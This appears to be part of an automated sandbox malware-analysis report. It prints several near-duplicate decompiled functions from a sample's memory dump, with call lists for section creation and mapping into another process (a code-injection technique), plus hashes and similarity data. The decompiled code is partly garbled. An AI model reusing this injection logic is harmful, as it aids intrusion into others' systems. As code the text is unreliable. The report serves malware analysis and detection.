				void* _t128;
				void* _t129;
				signed char _t130;
				void* _t131;
				void* _t133;
				HANDLE* _t134;
				intOrPtr* _t137;
				intOrPtr* _t138;
				void* _t141;
				long _t156;

				_push(0x165f);
				_t91 =  *_t137;
				_t138 = _t137 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t128 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t128, _t131, _t133, _t141);
				asm("cld");
				asm("invalid");
				_t118 = _a4;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				_v96 = _t93;
				_t134 =  &_v100;
				 *_t134 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t134);
				_t96 =  *_t134;
				if(_t96 != 0) {
					_t121 =  &_v52;
					 *_t121 = _t96;
					_t121[1] = 0;
					_t134 =  &_v44;
					 *((intOrPtr*)(_t118 + 0x10))(_t134, 0x18);
					 *_t134 = 0x18;
					_t130 = _t134;
					_push( &_v52);
					_push(_t130);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) == 0) {
						_v12 = 0;
						_t103 =  &_v84;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t134 =  &_v88;
						if(NtCreateSection(_t134, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t111 =  &_v72;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t134, 0xffffffff, _t111, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t113 =  &_v64;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t134, _v16, _t113, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
									_t134 = _v72;
									 *((intOrPtr*)(_t118 + 0x20))(0, _t134, 0x104);
									_t134[0x82] = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t105 =  &_v84;
						_t124 = _a12 + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t124;
						while(1) {
							_a1750575217 = _a1750575217 | _t124;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t124;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t134) != 0 || _v12 == 0) {
								goto L75;
							}
							_push(_v84);
							_pop( *_t47);
							_t107 =  &_v76;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t134, 0xffffffff, _t107, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t109 =  &_v68;
								 *_t109 = 0;
								_t124 =  &_v60;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t130;
									 *((intOrPtr*)(_t124 + 0x57)) =  *((intOrPtr*)(_t124 + 0x57)) + _t130;
									_push(0);
									_push(0);
									_push(_t109);
									_push(_v16);
									_t109 = NtMapViewOfSection( *_t134);
									_t156 = _t109;
									if(_t156 != 0) {
										goto L75;
									}
									L28();
									if(_t156 == 0 && _t156 != 0) {
										asm("out dx, al");
										if(_t156 > 0) {
											continue;
										} else {
											if (_t156 > 0) goto L22;
											goto L32;
										}
									}
									goto L75;
								}
							}
							goto L75;
						}
					}
				}
				L75:
				_push(0x165f);
				_t97 =  *_t138;
				_t120 = 0x38c;
				_t129 = 0xfd;
				L004012A4(_t97, _t118, _t120, _t129, 0, _t134, __eflags);
				return _t97;
			}

0x00401625
0x0040162a
0x0040162d
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401706
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401796
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
Instruction ID: b20ec665c7e4e3296b0f18af3c28397e7cf24639ebe04dcdbabd140aff290070
Opcode Fuzzy Hash: 360ad1a724b6dfd7efdf9099856e6addfa1f1d81a22987e82f57d8afae1e1ec3
Instruction Fuzzy Hash: 376160B0500249FBEB209F95CC49FEF7BB8EF91B00F14416AF912BA1E4D6759901DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401636 Relevance: 10.7, APIs: 7, Instructions: 192
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00401636(void* __eax) {
				void* _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void** _t122;
				signed char _t125;
				void* _t129;
				void* _t130;
				signed char _t131;
				void* _t132;
				HANDLE* _t136;
				void* _t139;
				void* _t140;
				intOrPtr* _t142;
				void* _t146;
				long _t161;

				_t91 = __eax;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t129 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t129, _t132, 0xf9e70ceb, _t146);
				_t140 = _t139 + 1;
				asm("cld");
				asm("invalid");
				_t118 =  *((intOrPtr*)(_t140 + 8));
				 *((intOrPtr*)(_t140 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t140 - 0x34)) =  *((intOrPtr*)(_t140 - 0x34)) + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t140 - 0x5c)) = _t93;
				_t136 = _t140 - 0x60;
				 *_t136 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t136);
				_t96 =  *_t136;
				if(_t96 != 0) {
					_t122 = _t140 - 0x30;
					 *_t122 = _t96;
					_t122[1] = 0;
					_t136 = _t140 - 0x28;
					 *((intOrPtr*)(_t118 + 0x10))(_t136, 0x18);
					 *_t136 = 0x18;
					_t131 = _t136;
					_push(_t140 - 0x30);
					_push(_t131);
					_push(0x40);
					_push(_t140 - 0x10);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t140 - 0x10), 0xffffffff, 0xffffffff, _t140 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t140 - 8)) = 0;
						_t103 = _t140 - 0x50;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t136 = _t140 - 0x54;
						if(NtCreateSection(_t136, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t140 - 0x50);
							_t111 = _t140 - 0x44;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t136, 0xffffffff, _t111, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
								_t113 = _t140 - 0x3c;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t136,  *(_t140 - 0xc), _t113, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
									_t136 =  *(_t140 - 0x44);
									 *((intOrPtr*)(_t118 + 0x20))(0, _t136, 0x104);
									_t136[0x82] =  *(_t140 + 0x14);
									 *((intOrPtr*)(_t140 - 8)) =  *((intOrPtr*)(_t140 - 8)) + 1;
								}
							}
						}
						_t105 = _t140 - 0x50;
						_t125 =  *((intOrPtr*)(_t140 + 0x10)) + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t125;
						while(1) {
							 *(_t140 + 0x6857a875) =  *(_t140 + 0x6857a875) | _t125;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t125;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t136) != 0 ||  *((intOrPtr*)(_t140 - 8)) == 0) {
								goto L73;
							}
							 *_t47 =  *(_t140 - 0x50);
							_t107 = _t140 - 0x48;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t136, 0xffffffff, _t107, 0, 0, 0, _t140 - 0x38, 1, 0, 4) == 0) {
								_t109 = _t140 - 0x40;
								 *_t109 = 0;
								_t125 = _t140 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t131;
									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
									_push(0);
									_push(0);
									_push(_t109);
									_push( *(_t140 - 0xc));
									_t109 = NtMapViewOfSection( *_t136);
									_t161 = _t109;
									if(_t161 != 0) {
										goto L73;
									}
									L26();
									if(_t161 == 0 && _t161 != 0) {
										asm("out dx, al");
										if(_t161 > 0) {
											continue;
										} else {
											if (_t161 > 0) goto L20;
											goto L30;
										}
									}
									goto L73;
								}
							}
							goto L73;
						}
					}
				}
				L73:
				_push(0x165f);
				_t97 =  *_t142;
				_t121 = 0x38c;
				_t130 = 0xfd;
				L004012A4(_t97, _t118, _t121, _t130, 0, _t136, __eflags);
				return _t97;
			}

0x00401636
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165b
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
Instruction ID: 1a98c01ee067268ab26ec5aa6b62cb03245118aa372be3bd2590492ddd99a6c2
Opcode Fuzzy Hash: 85ddd0e82bc134a6e3bb5800445b02694cb6cb065398d1344ab8a8f734f38392
Instruction Fuzzy Hash: 3B616EB1900209AFDB209F91CC49FEF7BB8FF86700F14056AF911BA2E1D6759901CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00401620() {
				intOrPtr _t92;
				intOrPtr _t94;
				void* _t97;
				intOrPtr _t98;
				struct _GUID _t104;
				signed char* _t106;
				PVOID* _t108;
				PVOID* _t112;
				PVOID* _t114;
				void* _t118;
				intOrPtr _t119;
				void* _t122;
				void** _t123;
				signed char _t126;
				void* _t130;
				void* _t131;
				signed char _t132;
				void* _t133;
				void* _t136;
				HANDLE* _t137;
				void* _t140;
				void* _t141;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t148;
				long _t163;

				asm("out 0x31, eax");
				asm("out dx, al");
				_push(0x165f);
				_t92 =  *_t143;
				_t144 = _t143 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t130 = 0xfd;
				L004012A4(_t92, _t118, 0x38c, _t130, _t133, _t136, _t148);
				_t141 = _t140 + 1;
				asm("cld");
				asm("invalid");
				_t119 =  *((intOrPtr*)(_t141 + 8));
				 *((intOrPtr*)(_t141 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
				}
				while(1) {
					_t94 =  *((intOrPtr*)(_t119 + 0x48))();
					if(_t94 != 0) {
						break;
					}
					 *((intOrPtr*)(_t119 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t141 - 0x5c)) = _t94;
				_t137 = _t141 - 0x60;
				 *_t137 = 0;
				 *((intOrPtr*)(_t119 + 0x4c))(_t94, _t137);
				_t97 =  *_t137;
				if(_t97 != 0) {
					_t123 = _t141 - 0x30;
					 *_t123 = _t97;
					_t123[1] = 0;
					_t137 = _t141 - 0x28;
					 *((intOrPtr*)(_t119 + 0x10))(_t137, 0x18);
					 *_t137 = 0x18;
					_t132 = _t137;
					_push(_t141 - 0x30);
					_push(_t132);
					_push(0x40);
					_push(_t141 - 0x10);
					if( *((intOrPtr*)(_t119 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t141 - 8)) = 0;
						_t104 = _t141 - 0x50;
						 *((intOrPtr*)(_t104 + 4)) = 0;
						 *_t104 = 0x5000;
						_t137 = _t141 - 0x54;
						if(NtCreateSection(_t137, 6, 0, _t104, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t141 - 0x50);
							_t112 = _t141 - 0x44;
							 *_t112 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t112, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t114 = _t141 - 0x3c;
								 *_t114 = 0;
								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t114, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
									_t137 =  *(_t141 - 0x44);
									 *((intOrPtr*)(_t119 + 0x20))(0, _t137, 0x104);
									_t137[0x82] =  *(_t141 + 0x14);
									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
								}
							}
						}
						_t106 = _t141 - 0x50;
						_t126 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
						_t106[4] = 0;
						 *_t106 = _t126;
						while(1) {
							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t126;
							 *_t106 =  &(_t106[ *_t106]);
							 *_t106 =  *_t106 + _t126;
							_push(0x40);
							_push(_t106);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
								goto L74;
							}
							 *_t47 =  *(_t141 - 0x50);
							_t108 = _t141 - 0x48;
							 *_t108 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t108, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t110 = _t141 - 0x40;
								 *_t110 = 0;
								_t126 = _t141 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t132;
									 *((intOrPtr*)(_t126 + 0x57)) =  *((intOrPtr*)(_t126 + 0x57)) + _t132;
									_push(0);
									_push(0);
									_push(_t110);
									_push( *(_t141 - 0xc));
									_t110 = NtMapViewOfSection( *_t137);
									_t163 = _t110;
									if(_t163 != 0) {
										goto L74;
									}
									L27();
									if(_t163 == 0 && _t163 != 0) {
										asm("out dx, al");
										if(_t163 > 0) {
											continue;
										} else {
											if (_t163 > 0) goto L21;
											goto L31;
										}
									}
									goto L74;
								}
							}
							goto L74;
						}
					}
				}
				L74:
				_push(0x165f);
				_t98 =  *_t144;
				_t122 = 0x38c;
				_t131 = 0xfd;
				L004012A4(_t98, _t119, _t122, _t131, 0, _t137, __eflags);
				return _t98;
			}

0x00401622
0x00401624
0x00401625
0x0040162a
0x0040162d
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165b
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
Instruction ID: 1699ca97ca40bad7abeb66134b5fd6c1258c3ab016587a1f667b162b5110635e
Opcode Fuzzy Hash: e8c799dd4ee962bf847dbb38df63c582ffec6373d205d10da14d7cadb3d73448
Instruction Fuzzy Hash: 5B513DB4900249BFEB209F95CC48FEF7BB8EF85700F14416AF911BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401633 Relevance: 10.7, APIs: 7, Instructions: 174
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00401633(void* __edi) {
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t121;
				void** _t122;
				signed char _t125;
				void* _t129;
				void* _t130;
				signed char _t131;
				void* _t136;
				HANDLE* _t137;
				void* _t140;
				void* _t141;
				intOrPtr* _t143;
				intOrPtr* _t144;
				void* _t148;
				long _t163;

				_t133 = __edi - 1;
				_t148 = __edi - 1;
				_push(0x165f);
				_t91 =  *_t143;
				_t144 = _t143 + 4;
				__eax = __eax | 0x68e1228a;
				__eflags = __eax;
				_t129 = 0xfd;
				L004012A4(_t91, _t117, 0x38c, _t129, _t133, _t136, _t148);
				_t141 = _t140 + 1;
				asm("cld");
				asm("invalid");
				_t118 =  *((intOrPtr*)(_t141 + 8));
				 *((intOrPtr*)(_t141 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t141 - 0x34)) =  *((intOrPtr*)(_t141 - 0x34)) + 1;
				}
				while(1) {
					_t93 =  *((intOrPtr*)(_t118 + 0x48))();
					if(_t93 != 0) {
						break;
					}
					 *((intOrPtr*)(_t118 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t141 - 0x5c)) = _t93;
				_t137 = _t141 - 0x60;
				 *_t137 = 0;
				 *((intOrPtr*)(_t118 + 0x4c))(_t93, _t137);
				_t96 =  *_t137;
				if(_t96 != 0) {
					_t122 = _t141 - 0x30;
					 *_t122 = _t96;
					_t122[1] = 0;
					_t137 = _t141 - 0x28;
					 *((intOrPtr*)(_t118 + 0x10))(_t137, 0x18);
					 *_t137 = 0x18;
					_t131 = _t137;
					_push(_t141 - 0x30);
					_push(_t131);
					_push(0x40);
					_push(_t141 - 0x10);
					if( *((intOrPtr*)(_t118 + 0x70))() == 0 && NtDuplicateObject( *(_t141 - 0x10), 0xffffffff, 0xffffffff, _t141 - 0xc, 0, 0, 2) == 0) {
						 *((intOrPtr*)(_t141 - 8)) = 0;
						_t103 = _t141 - 0x50;
						 *((intOrPtr*)(_t103 + 4)) = 0;
						 *_t103 = 0x5000;
						_t137 = _t141 - 0x54;
						if(NtCreateSection(_t137, 6, 0, _t103, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t141 - 0x50);
							_t111 = _t141 - 0x44;
							 *_t111 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t111, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t113 = _t141 - 0x3c;
								 *_t113 = 0;
								if(NtMapViewOfSection( *_t137,  *(_t141 - 0xc), _t113, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
									_t137 =  *(_t141 - 0x44);
									 *((intOrPtr*)(_t118 + 0x20))(0, _t137, 0x104);
									_t137[0x82] =  *(_t141 + 0x14);
									 *((intOrPtr*)(_t141 - 8)) =  *((intOrPtr*)(_t141 - 8)) + 1;
								}
							}
						}
						_t105 = _t141 - 0x50;
						_t125 =  *((intOrPtr*)(_t141 + 0x10)) + 0x10000;
						_t105[4] = 0;
						 *_t105 = _t125;
						while(1) {
							 *(_t141 + 0x6857a875) =  *(_t141 + 0x6857a875) | _t125;
							 *_t105 =  &(_t105[ *_t105]);
							 *_t105 =  *_t105 + _t125;
							_push(0x40);
							_push(_t105);
							_push(0);
							_push(0xe);
							if(NtCreateSection(_t137) != 0 ||  *((intOrPtr*)(_t141 - 8)) == 0) {
								goto L75;
							}
							 *_t47 =  *(_t141 - 0x50);
							_t107 = _t141 - 0x48;
							 *_t107 = 0;
							if(NtMapViewOfSection( *_t137, 0xffffffff, _t107, 0, 0, 0, _t141 - 0x38, 1, 0, 4) == 0) {
								_t109 = _t141 - 0x40;
								 *_t109 = 0;
								_t125 = _t141 - 0x38;
								_push(0x20);
								while(1) {
									 *0x0000006A =  *0x0000006A & _t131;
									 *((intOrPtr*)(_t125 + 0x57)) =  *((intOrPtr*)(_t125 + 0x57)) + _t131;
									_push(0);
									_push(0);
									_push(_t109);
									_push( *(_t141 - 0xc));
									_t109 = NtMapViewOfSection( *_t137);
									_t163 = _t109;
									if(_t163 != 0) {
										goto L75;
									}
									L28();
									if(_t163 == 0 && _t163 != 0) {
										asm("out dx, al");
										if(_t163 > 0) {
											continue;
										} else {
											if (_t163 > 0) goto L22;
											goto L32;
										}
									}
									goto L75;
								}
							}
							goto L75;
						}
					}
				}
				L75:
				_push(0x165f);
				_t97 =  *_t144;
				_t121 = 0x38c;
				_t130 = 0xfd;
				L004012A4(_t97, _t118, _t121, _t130, 0, _t137, __eflags);
				return _t97;
			}

0x00401633
0x00401633
0x00401625
0x0040162a
0x0040162d
0x00401649
0x00401649
0x00401652
0x0040165a
0x0040165b
0x0040165c
0x0040165d
0x0040165f
0x00401664
0x0040166d
0x0040166f
0x0040166f
0x00401672
0x00401672
0x00401677
0x00000000
0x00000000
0x0040199f
0x0040199f
0x0040167d
0x00401680
0x00401683
0x00401687
0x0040168a
0x0040168e
0x00401694
0x00401697
0x00401699
0x0040169c
0x004016a2
0x004016a5
0x004016ab
0x004016b3
0x004016b4
0x004016b5
0x004016b7
0x004016bd
0x004016e0
0x004016e3
0x004016e6
0x004016e9
0x004016ef
0x00401704
0x00401709
0x0040170c
0x0040170f
0x00401727
0x00401729
0x0040172c
0x00401745
0x00401747
0x00401751
0x00401757
0x0040175d
0x0040175d
0x00401745
0x00401727
0x00401760
0x00401766
0x0040176c
0x0040176f
0x00401770
0x00401770
0x00401776
0x00401778
0x0040177a
0x0040177c
0x0040177d
0x0040177e
0x00401786
0x00000000
0x00000000
0x00401799
0x0040179c
0x0040179f
0x004017b7
0x004017bd
0x004017c0
0x004017c2
0x004017c5
0x004017c6
0x004017c6
0x004017c9
0x004017cc
0x004017cd
0x004017ce
0x004017cf
0x004017d4
0x004017d7
0x004017d9
0x00000000
0x00000000
0x004017df
0x004017e4
0x004017e8
0x004017e9
0x00000000
0x004017eb
0x004017eb
0x00000000
0x004017eb
0x004017e9
0x00000000
0x004017e4
0x004017c6
0x00000000
0x004017b7
0x00401770
0x004016bd
0x00401998
0x004019ae
0x004019b3
0x004019ca
0x004019de
0x004019e6
0x004019ef

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D2
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016FF
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401722
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401740
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401781
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D4

Memory Dump Source

Source File: 00000001.00000002.447745165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
